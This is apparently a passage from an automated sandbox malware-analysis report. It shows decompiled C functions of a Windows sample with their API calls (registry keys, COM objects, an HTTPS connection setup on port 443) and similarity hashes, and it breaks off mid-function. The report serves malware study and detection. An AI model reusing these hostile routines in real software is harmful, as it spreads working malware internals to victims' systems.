                              				long _t14;
                              				intOrPtr _t18;
                              				intOrPtr _t19;
                              				intOrPtr _t26;
                              				intOrPtr _t27;
                              				long _t28;
                              
                              				_t27 = __edi;
                              				_t26 = _a8;
                              				_t14 = E049D6FB2(_a4, _t26, __edi); // executed
                              				_t28 = _t14;
                              				if(_t28 != 0) {
                              					memset( &_v60, 0, 0x38);
                              					_t18 =  *0x49dd2b8; // 0xe3a5a8
                              					_t28 = 0;
                              					_v64 = 0x3c;
                              					if(_a12 == 0) {
                              						_t7 = _t18 + 0x49de4e8; // 0x70006f
                              						_t19 = _t7;
                              					} else {
                              						_t6 = _t18 + 0x49de8d0; // 0x750072
                              						_t19 = _t6;
                              					}
                              					_v52 = _t19;
                              					_push(_t28);
                              					_v48 = _a4;
                              					_v44 = _t26;
                              					_v36 = _t27;
                              					E049D2522();
                              					_push( &_v64);
                              					if( *0x49dd0e4() == 0) {
                              						_t28 = GetLastError();
                              					}
                              					_push(1);
                              					E049D2522();
                              				}
                              				return _t28;
                              			}

                              APIs
                                • Part of subcall function 049D6FB2: SysAllocString.OLEAUT32(00000000), ref: 049D700E
                                • Part of subcall function 049D6FB2: SysAllocString.OLEAUT32(0070006F), ref: 049D7022
                                • Part of subcall function 049D6FB2: SysAllocString.OLEAUT32(00000000), ref: 049D7034
                                • Part of subcall function 049D6FB2: SysFreeString.OLEAUT32(00000000), ref: 049D7098
                              • memset.NTDLL ref: 049D6304
                              • GetLastError.KERNEL32 ref: 049D6350
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: String$Alloc$ErrorFreeLastmemset
                              • String ID: <
                              • API String ID: 1330562889-4251816714
                              • Opcode ID: 164ee0f776e8037f564435177378e4b376df96f6ed86993101e5cc65c4b25da9
                              • Instruction ID: 5e0cf6488e6b9b9687d7bb7cd001b3cb64d47905135e1f3122fed15d8d96333c
                              • Opcode Fuzzy Hash: 164ee0f776e8037f564435177378e4b376df96f6ed86993101e5cc65c4b25da9
                              • Instruction Fuzzy Hash: AF012971A00218ABDB10EFA8D884EDEBBBCAF48744F448136F905E7250E770E9418BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RegCreateKeyA.ADVAPI32(80000001,064FB7F0,064F8578), ref: 053D64F3
                              • RegOpenKeyA.ADVAPI32(80000001,064FB7F0,064F8578), ref: 053D64FD
                              • lstrlen.KERNEL32(064FB7F0,00000000,00000000,053EF072,?,?,?,053CFFEA,00000001,00000001,064F8578), ref: 053D651C
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CreateOpenlstrlen
                              • String ID:
                              • API String ID: 2865187142-0
                              • Opcode ID: e19c9a3dcb2d878a58d81b3774c7baf721855a817ef1b2db50791ea8bcd5eed0
                              • Instruction ID: a96b28b55bb36d461825c5e6db1a79cd896048aae591cb5946007b9b339f7442
                              • Opcode Fuzzy Hash: e19c9a3dcb2d878a58d81b3774c7baf721855a817ef1b2db50791ea8bcd5eed0
                              • Instruction Fuzzy Hash: 63F062B6100208BFD7219F90EC4AFAB7FBDEB857A0F10811AF90289140D6B0DA80C770
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SetEvent.KERNEL32(0000010C,053D161F), ref: 053E250B
                                • Part of subcall function 053E22AA: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,053E2516), ref: 053E22D3
                                • Part of subcall function 053E22AA: RtlDeleteCriticalSection.NTDLL(053F0440), ref: 053E2306
                                • Part of subcall function 053E22AA: RtlDeleteCriticalSection.NTDLL(053F0460), ref: 053E230D
                                • Part of subcall function 053E22AA: ReleaseMutex.KERNEL32(000007D0,00000000,?,?,?,053E2516), ref: 053E2335
                                • Part of subcall function 053E22AA: CloseHandle.KERNEL32(?,?,053E2516), ref: 053E2341
                                • Part of subcall function 053E22AA: ResetEvent.KERNEL32(00000000,00000000,?,?,?,053E2516), ref: 053E234D
                                • Part of subcall function 053E22AA: CloseHandle.KERNEL32(?,?,053E2516), ref: 053E2359
                                • Part of subcall function 053E22AA: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,053E2516), ref: 053E235F
                                • Part of subcall function 053E22AA: SleepEx.KERNEL32(00000064,00000001,?,?,053E2516), ref: 053E2373
                                • Part of subcall function 053E22AA: HeapFree.KERNEL32(00000000,00000000,?,?,053E2516), ref: 053E2396
                                • Part of subcall function 053E22AA: RtlRemoveVectoredExceptionHandler.NTDLL(04AD05B8), ref: 053E23D0
                                • Part of subcall function 053E22AA: SleepEx.KERNEL32(00000064,00000001,?,?,053E2516), ref: 053E23DF
                              • CloseHandle.KERNEL32(0000010C), ref: 053E2520
                              • HeapDestroy.KERNELBASE(06100000), ref: 053E2530
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Sleep$CloseHandle$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
                              • String ID:
                              • API String ID: 2773679374-0
                              • Opcode ID: 0f6f5c9fa8d896c98b872189225f7220a1fc17154a5029cb72ce825db5a6ebab
                              • Instruction ID: 6e291eefdd97787836af48cceac5ee86558f1a15c4eecde6f6339c434ea75ce7
                              • Opcode Fuzzy Hash: 0f6f5c9fa8d896c98b872189225f7220a1fc17154a5029cb72ce825db5a6ebab
                              • Instruction Fuzzy Hash: EDE0ECB87242124B8B319F74E95DA0B3BEDBA04341B040415B406CE1C4DE38EA05C710
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E049D60DD(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                              				int _v12;
                              				signed int _v16;
                              				void* _v20;
                              				signed char _v36;
                              				void* _t24;
                              				intOrPtr _t27;
                              				signed int _t38;
                              				signed char* _t46;
                              				int _t53;
                              				void* _t55;
                              				void* _t56;
                              				void* _t57;
                              
                              				_v16 = _v16 & 0x00000000;
                              				_t46 = _a4;
                              				_t53 = ( *_t46 & 0x000000ff) + 0x110;
                              				_v12 = 0x110;
                              				_t24 = E049D55DC(_t53);
                              				_a4 = _t24;
                              				if(_t24 != 0) {
                              					memcpy(_t24,  *0x49dd308, 0x110);
                              					_t27 =  *0x49dd30c; // 0x0
                              					_t57 = _t56 + 0xc;
                              					if(_t27 != 0) {
                              						_t51 = _a4;
                              						E049D6E0F(0x110, _a4, _t27, 0);
                              					}
                              					if(E049D8DD3( &_v36) != 0 && E049D6E7F(0x110, _a4,  &_v20,  &_v12,  &_v36, 0) == 0) {
                              						_t55 = _v20;
                              						_v36 =  *_t46;
                              						_t38 = E049D2363(_t55, _a8, _t51, _t46, _a12); // executed
                              						_v16 = _t38;
                              						 *(_t55 + 4) = _v36;
                              						memset(_t55, 0, _v12 - (_t46[4] & 0xf));
                              						_t57 = _t57 + 0xc;
                              						E049D6DFA(_t55);
                              					}
                              					memset(_a4, 0, _t53);
                              					E049D6DFA(_a4);
                              				}
                              				return _v16;
                              			}

                              APIs
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • memcpy.NTDLL(00000000,00000110,?,?,?,00000008), ref: 049D6113
                              • memset.NTDLL ref: 049D6188
                              • memset.NTDLL ref: 049D619C
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: memset$AllocateHeapmemcpy
                              • String ID:
                              • API String ID: 1529149438-0
                              • Opcode ID: 5b9bff80f333cc0f50e19a3f06e3693333d520a79ac083170975f07ac4f9d327
                              • Instruction ID: 3830f573b22f45abe4414ca0a1c5e4f88d0d0dcb2cfffc703d64f8f92f56c7fa
                              • Opcode Fuzzy Hash: 5b9bff80f333cc0f50e19a3f06e3693333d520a79ac083170975f07ac4f9d327
                              • Instruction Fuzzy Hash: C5213175A00218ABEB11EF55CC41FEEBBB8EF49654F048035F905E7241E734EA51CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 89%
                              			E049D447C(void* __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
                              				char _v8;
                              				void* _t14;
                              				intOrPtr _t17;
                              				void* _t20;
                              				void* _t26;
                              
                              				_push(__ecx);
                              				if(_a4 == 0 || __eax == 0) {
                              					_t26 = 0x57;
                              				} else {
                              					_t14 = E049D78A8(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
                              					_t26 = _t14;
                              					if(_t26 == 0) {
                              						_t17 =  *0x49dd2b8; // 0xe3a5a8
                              						_t9 = _t17 + 0x49dea1c; // 0x444f4340
                              						_t20 = E049D456E( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
                              						_t26 = _t20;
                              						RtlFreeHeap( *0x49dd270, 0, _a4); // executed
                              					}
                              				}
                              				return _t26;
                              			}

                              APIs
                                • Part of subcall function 049D78A8: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 049D78C0
                                • Part of subcall function 049D456E: lstrlen.KERNEL32(747DF710,?,00000000,?,747DF710), ref: 049D45A2
                                • Part of subcall function 049D456E: StrStrA.SHLWAPI(00000000,?), ref: 049D45AF
                                • Part of subcall function 049D456E: RtlAllocateHeap.NTDLL(00000000,?), ref: 049D45CE
                              • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,049D2EB0), ref: 049D44D2
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Heap$Allocate$Freelstrlen
                              • String ID: Uxt
                              • API String ID: 2220322926-1536154274
                              • Opcode ID: 767e304d03f208d09b093ca1347eae56f62dc1ef715c4be3eea41a458e2d5851
                              • Instruction ID: c0e5aa31314b82924460a89e8a82b727a27180f9921a0807b2b144d6dd76cbd0
                              • Opcode Fuzzy Hash: 767e304d03f208d09b093ca1347eae56f62dc1ef715c4be3eea41a458e2d5851
                              • Instruction Fuzzy Hash: 7F011976200508FFDB12CF54DC40EAA7BE9EB84358F108135FA0996160E771FA95DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E049D6DFA(void* _a4) {
                              				char _t2;
                              
                              				_t2 = RtlFreeHeap( *0x49dd270, 0, _a4); // executed
                              				return _t2;
                              			}

                              APIs
                              • RtlFreeHeap.NTDLL(00000000,00000000,049D55CD,00000000,?,?,00000000), ref: 049D6E06
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: FreeHeap
                              • String ID: Uxt
                              • API String ID: 3298025750-1536154274
                              • Opcode ID: 8ca3d3a6911e8cce156996d10ec79b9a7a86eeee42c52f48f54b65d858b435cf
                              • Instruction ID: 10ef4c933ed0b7c71310fa8a7acd0a8c846b3e223e2a7c0088b19f7ea3da842b
                              • Opcode Fuzzy Hash: 8ca3d3a6911e8cce156996d10ec79b9a7a86eeee42c52f48f54b65d858b435cf
                              • Instruction Fuzzy Hash: B6B09275049100AADE114A10DE08B057E21E750700F018021E200000A082354860EA15
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 38%
                              			E049D4176(intOrPtr _a4) {
                              				void* _v12;
                              				void* _v16;
                              				void* _v20;
                              				void* _v24;
                              				void* _v28;
                              				char _v32;
                              				intOrPtr _v40;
                              				void* _v46;
                              				short _v48;
                              				intOrPtr _t49;
                              				void* _t51;
                              				intOrPtr* _t53;
                              				intOrPtr _t56;
                              				void* _t58;
                              				intOrPtr* _t59;
                              				intOrPtr* _t61;
                              				intOrPtr* _t63;
                              				intOrPtr* _t65;
                              				intOrPtr* _t67;
                              				intOrPtr* _t69;
                              				intOrPtr* _t71;
                              				intOrPtr* _t73;
                              				intOrPtr _t76;
                              				intOrPtr* _t79;
                              				short _t81;
                              				char* _t97;
                              				intOrPtr _t99;
                              				void* _t105;
                              				void* _t107;
                              				intOrPtr _t111;
                              
                              				_t81 = 0;
                              				_v48 = 0;
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosw");
                              				_t49 =  *0x49dd2b8; // 0xe3a5a8
                              				_t4 = _t49 + 0x49de44c; // 0x58189f4
                              				_t5 = _t49 + 0x49de43c; // 0x9ba05972
                              				_t51 =  *0x49dd124(_t5, 0, 4, _t4,  &_v20); // executed
                              				_t105 = _t51;
                              				if(_t105 >= 0) {
                              					_t53 = _v20;
                              					_push( &_v12);
                              					_push(1);
                              					_push( &_v32);
                              					_push(8);
                              					_t97 =  &_v48;
                              					_push(_t97);
                              					_push(_t97);
                              					_push(_t53); // executed
                              					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
                              						_t56 =  *0x49dd2b8; // 0xe3a5a8
                              						_t30 = _t56 + 0x49de42c; // 0x58189d4
                              						_t31 = _t56 + 0x49de45c; // 0x4c96be40
                              						_t58 =  *0x49dd0f0(_v12, _t31, _t30,  &_v24); // executed
                              						_t105 = _t58;
                              						_t59 = _v12;
                              						 *((intOrPtr*)( *_t59 + 8))(_t59);
                              						goto L11;
                              					} else {
                              						_t71 = _v20;
                              						_v16 = 0;
                              						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
                              						if(_t105 >= 0) {
                              							_t111 = _v16;
                              							if(_t111 == 0) {
                              								_t105 = 0x80004005;
                              								goto L11;
                              							} else {
                              								if(_t111 <= 0) {
                              									L11:
                              									if(_t105 >= 0) {
                              										goto L12;
                              									}
                              								} else {
                              									do {
                              										_t73 = _v20;
                              										_v48 = 3;
                              										_v40 = _t81;
                              										_t107 = _t107 - 0x10;
                              										asm("movsd");
                              										asm("movsd");
                              										asm("movsd");
                              										asm("movsd");
                              										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
                              										if(_t105 < 0) {
                              											goto L7;
                              										} else {
                              											_t76 =  *0x49dd2b8; // 0xe3a5a8
                              											_t23 = _t76 + 0x49de42c; // 0x58189d4
                              											_t24 = _t76 + 0x49de45c; // 0x4c96be40
                              											_t105 =  *0x49dd0f0(_v12, _t24, _t23,  &_v24);
                              											_t79 = _v12;
                              											 *((intOrPtr*)( *_t79 + 8))(_t79);
                              											if(_t105 >= 0) {
                              												L12:
                              												_t63 = _v24;
                              												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
                              												if(_t105 >= 0) {
                              													_t99 =  *0x49dd2b8; // 0xe3a5a8
                              													_t67 = _v28;
                              													_t40 = _t99 + 0x49de41c; // 0x214e3
                              													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
                              													_t69 = _v28;
                              													 *((intOrPtr*)( *_t69 + 8))(_t69);
                              												}
                              												_t65 = _v24;
                              												 *((intOrPtr*)( *_t65 + 8))(_t65);
                              											} else {
                              												goto L7;
                              											}
                              										}
                              										goto L15;
                              										L7:
                              										_t81 = _t81 + 1;
                              									} while (_t81 < _v16);
                              									goto L11;
                              								}
                              							}
                              						}
                              					}
                              					L15:
                              					_t61 = _v20;
                              					 *((intOrPtr*)( *_t61 + 8))(_t61);
                              				}
                              				return _t105;
                              			}

                              APIs
                              • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,058189D4,049D6FE2,?,?,?,?,?,?,?,?,?,?,?,049D6FE2), ref: 049D4242
                              • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,058189D4,049D6FE2,?,?,?,?,?,?,?,049D6FE2,00000000,00000000,00000000,006D0063), ref: 049D4280
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: QueryServiceUnknown_
                              • String ID:
                              • API String ID: 2042360610-0
                              • Opcode ID: 82bf6b8e2a2afb0fac7c0d5d575c99c3aca1b5293e1d96c75ed43d8a3814d260
                              • Instruction ID: 3e34ea64c698eeb29e94f4a043d045bfbe13ba432dc4491e30abd4725e2d8c83
                              • Opcode Fuzzy Hash: 82bf6b8e2a2afb0fac7c0d5d575c99c3aca1b5293e1d96c75ed43d8a3814d260
                              • Instruction Fuzzy Hash: 0E514175D00519AFDF00DFE8C888DAEB7B9FF88710B058668EA15EB250D771AD45CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 21%
                              			E049D4638(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
                              				void* _v8;
                              				char _v12;
                              				signed int _t34;
                              				long _t36;
                              				long _t37;
                              				signed int _t38;
                              				void* _t39;
                              				signed int _t40;
                              				intOrPtr _t42;
                              				intOrPtr _t43;
                              				intOrPtr _t45;
                              				void* _t56;
                              				intOrPtr _t57;
                              				void* _t63;
                              				intOrPtr* _t65;
                              				intOrPtr* _t66;
                              				void* _t69;
                              
                              				_t66 = __esi;
                              				_t63 = E049D65F6(_t34, _a4);
                              				if(_t63 == 0) {
                              					L18:
                              					_t36 = GetLastError();
                              				} else {
                              					_t37 = GetVersion();
                              					_t69 = _t37 - 6;
                              					if(_t69 > 0 || _t69 == 0 && _t37 > 2) {
                              						_a4 = 4;
                              					} else {
                              						_a4 = 0;
                              					}
                              					__imp__(_t63, _a4, 0, 0, 0); // executed
                              					 *(_t66 + 0x10) = _t37;
                              					_t38 = E049D6DFA(_t63);
                              					if( *(_t66 + 0x10) == 0) {
                              						goto L18;
                              					} else {
                              						_t39 = E049D65F6(_t38,  *_t66);
                              						_v8 = _t39;
                              						if(_t39 == 0) {
                              							goto L18;
                              						} else {
                              							_t65 = __imp__; // 0x703bf5a0
                              							if(_a8 == 0) {
                              								L10:
                              								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
                              								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
                              								_t40 = E049D6DFA(_v8);
                              								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
                              									goto L18;
                              								} else {
                              									_a4 = 0x800100;
                              									_t56 = E049D65F6(_t40,  *((intOrPtr*)(_t66 + 4)));
                              									if(_t56 == 0) {
                              										goto L18;
                              									} else {
                              										_t42 =  *0x49dd2b8; // 0xe3a5a8
                              										_t19 = _t42 + 0x49de758; // 0x450047
                              										_t43 = _t19;
                              										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
                              										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
                              										E049D6DFA(_t56);
                              										_t45 =  *((intOrPtr*)(_t66 + 0x18));
                              										if(_t45 == 0) {
                              											goto L18;
                              										} else {
                              											_t57 = 4;
                              											_v12 = _t57;
                              											__imp__(_t45, 0x1f,  &_a4,  &_v12);
                              											if(_t45 != 0) {
                              												_a4 = _a4 | 0x00000100;
                              												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
                              											}
                              											_push(_t57);
                              											_push( &_a8);
                              											_push(6);
                              											_push( *((intOrPtr*)(_t66 + 0x18)));
                              											if( *_t65() == 0) {
                              												goto L18;
                              											} else {
                              												_push(_t57);
                              												_push( &_a8);
                              												_push(5);
                              												_push( *((intOrPtr*)(_t66 + 0x18)));
                              												if( *_t65() == 0) {
                              													goto L18;
                              												} else {
                              													_t36 = 0;
                              												}
                              											}
                              										}
                              									}
                              								}
                              							} else {
                              								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
                              								if(_t39 == 0) {
                              									goto L18;
                              								} else {
                              									goto L10;
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return _t36;
                              			}

                              APIs
                                • Part of subcall function 049D65F6: lstrlen.KERNEL32(?,00000000,05819B78,00000000,049D25B8,05819D56,69B25F44,?,?,?,?,69B25F44,00000005,049DD00C,4D283A53,?), ref: 049D65FD
                                • Part of subcall function 049D65F6: mbstowcs.NTDLL ref: 049D6626
                                • Part of subcall function 049D65F6: memset.NTDLL ref: 049D6638
                              • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,049D572B,747C81D0,00000000,05819618,?,?,049D3B91,?,05819618,0000EA60), ref: 049D4653
                              • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,049D572B,747C81D0,00000000,05819618,?,?,049D3B91,?,05819618,0000EA60), ref: 049D477C
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                              • String ID:
                              • API String ID: 4097109750-0
                              • Opcode ID: 3132dc9cd8241eeab78c70bbc1c71abab1965264591060322988a613617973a1
                              • Instruction ID: 7ae988efe265754291d41e9d7de48038dc91b2efa5cf6aa14151914868913e6a
                              • Opcode Fuzzy Hash: 3132dc9cd8241eeab78c70bbc1c71abab1965264591060322988a613617973a1
                              • Instruction Fuzzy Hash: 62415CB5100204BFEB219FA4CC84EAB7BBDEB88741F408539F64296091E771EA94DF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E049D5A5E(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                              				void* _v8;
                              				void* __esi;
                              				intOrPtr* _t35;
                              				void* _t40;
                              				intOrPtr* _t41;
                              				intOrPtr* _t43;
                              				intOrPtr* _t45;
                              				intOrPtr* _t50;
                              				intOrPtr* _t52;
                              				void* _t54;
                              				intOrPtr* _t55;
                              				intOrPtr* _t57;
                              				intOrPtr* _t61;
                              				intOrPtr* _t65;
                              				intOrPtr _t68;
                              				void* _t72;
                              				void* _t75;
                              				void* _t76;
                              
                              				_t55 = _a4;
                              				_t35 =  *((intOrPtr*)(_t55 + 4));
                              				_a4 = 0;
                              				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                              				if(_t76 < 0) {
                              					L18:
                              					return _t76;
                              				}
                              				_t40 = E049D6A4D(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                              				_t76 = _t40;
                              				if(_t76 >= 0) {
                              					_t61 = _a28;
                              					if(_t61 != 0 &&  *_t61 != 0) {
                              						_t52 = _v8;
                              						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                              					}
                              					if(_t76 >= 0) {
                              						_t43 =  *_t55;
                              						_t68 =  *0x49dd2b8; // 0xe3a5a8
                              						_t20 = _t68 + 0x49de1fc; // 0x740053
                              						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                              						if(_t76 >= 0) {
                              							_t76 = E049D4B0E(_a4);
                              							if(_t76 >= 0) {
                              								_t65 = _a28;
                              								if(_t65 != 0 &&  *_t65 == 0) {
                              									_t50 = _a4;
                              									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                              								}
                              							}
                              						}
                              						_t45 = _a4;
                              						if(_t45 != 0) {
                              							 *((intOrPtr*)( *_t45 + 8))(_t45);
                              						}
                              						_t57 = __imp__#6;
                              						if(_a20 != 0) {
                              							 *_t57(_a20);
                              						}
                              						if(_a12 != 0) {
                              							 *_t57(_a12);
                              						}
                              					}
                              				}
                              				_t41 = _v8;
                              				 *((intOrPtr*)( *_t41 + 8))(_t41);
                              				goto L18;
                              			}

                              APIs
                                • Part of subcall function 049D6A4D: SysAllocString.OLEAUT32(80000002), ref: 049D6AA4
                                • Part of subcall function 049D6A4D: SysFreeString.OLEAUT32(00000000), ref: 049D6B09
                              • SysFreeString.OLEAUT32(?), ref: 049D5B3D
                              • SysFreeString.OLEAUT32(049D4993), ref: 049D5B47
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: String$Free$Alloc
                              • String ID:
                              • API String ID: 986138563-0
                              • Opcode ID: 2f195ec261b766b19f188db9b7f8b7d3099e4b89c9e9763edb3051351706a116
                              • Instruction ID: 1a3f3bcae3ee800acc7068ffb199a3a41d308811e8b2e80db7dd01a1df7e37cb
                              • Opcode Fuzzy Hash: 2f195ec261b766b19f188db9b7f8b7d3099e4b89c9e9763edb3051351706a116
                              • Instruction Fuzzy Hash: 35313772500119FFCB21DFA9D888CABBB79FFC97507158668F8059B210D235ED91CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053D64DE: RegCreateKeyA.ADVAPI32(80000001,064FB7F0,064F8578), ref: 053D64F3
                                • Part of subcall function 053D64DE: lstrlen.KERNEL32(064FB7F0,00000000,00000000,053EF072,?,?,?,053CFFEA,00000001,00000001,064F8578), ref: 053D651C
                              • RegQueryValueExA.KERNEL32(00000001,064F8578,00000000,?,053EF06C,00000000,00000001,00000001,064F8578,053EF072,00000000,?,?,?,064F8578,00000001), ref: 053D000B
                              • RegCloseKey.ADVAPI32(?), ref: 053D0054
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CloseCreateQueryValuelstrlen
                              • String ID:
                              • API String ID: 971780412-0
                              • Opcode ID: 45807c003bb16d5ad94631e8cdd530ce3ffff8b1726336363988167afc14bf6d
                              • Instruction ID: f830efcbab9d71e15ee11ec1df1ca467aa5c8bf03b9c2027b01cc97f70c53190
                              • Opcode Fuzzy Hash: 45807c003bb16d5ad94631e8cdd530ce3ffff8b1726336363988167afc14bf6d
                              • Instruction Fuzzy Hash: AC311A76D10119EFCB22DB95E8499AEBFBDFB04751F11816AF504AA180EBB05E40CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 50%
                               			E049D5F72(intOrPtr* __eax, intOrPtr _a4) {
                               				void* _v8;
                               				void* _v12;
                               				void* _v16;
                               				intOrPtr _t2;
                               				intOrPtr _t6;
                               				intOrPtr _t12;
                               				intOrPtr* _t22;
                               				void* _t23;
                               				intOrPtr* _t24;
                               				intOrPtr* _t26;
                               				intOrPtr* _t28;
                               				intOrPtr* _t30;
                               				void* _t31;
                               				intOrPtr* _t32;
                               				intOrPtr _t42;
                               				intOrPtr _t45;
                               				intOrPtr _t48;
                               				void* _t51;
                               
                               				// Walks a chain of three COM interfaces starting from the object in __eax and
                               				// returns the last one through _a4. _t51 carries the HRESULT of the most recent
                               				// call (>= 0 is success); every interface obtained on the way is Released again.
                               				_push( &_v16);
                               				_t42 =  *0x49dd2b8; // 0xe3a5a8: global base; the IIDs used below are stored relative to it instead of as plain constants
                               				_t2 = _t42 + 0x49de46c; // 0x20400 (computed, not used in this listing)
                               				_push(0);
                               				_push(__eax);
                               				_t51 =  *((intOrPtr*)( *__eax + 0x3c))(); // vtable slot 15 (offset 0x3c) called as (this, 0, &_v16): first interface -> _v16
                               				if(_t51 >= 0) {
                               					_t22 = _v16;
                               					_t45 =  *0x49dd2b8; // 0xe3a5a8
                               					_t6 = _t45 + 0x49de48c; // 0xe7a1af80: riid
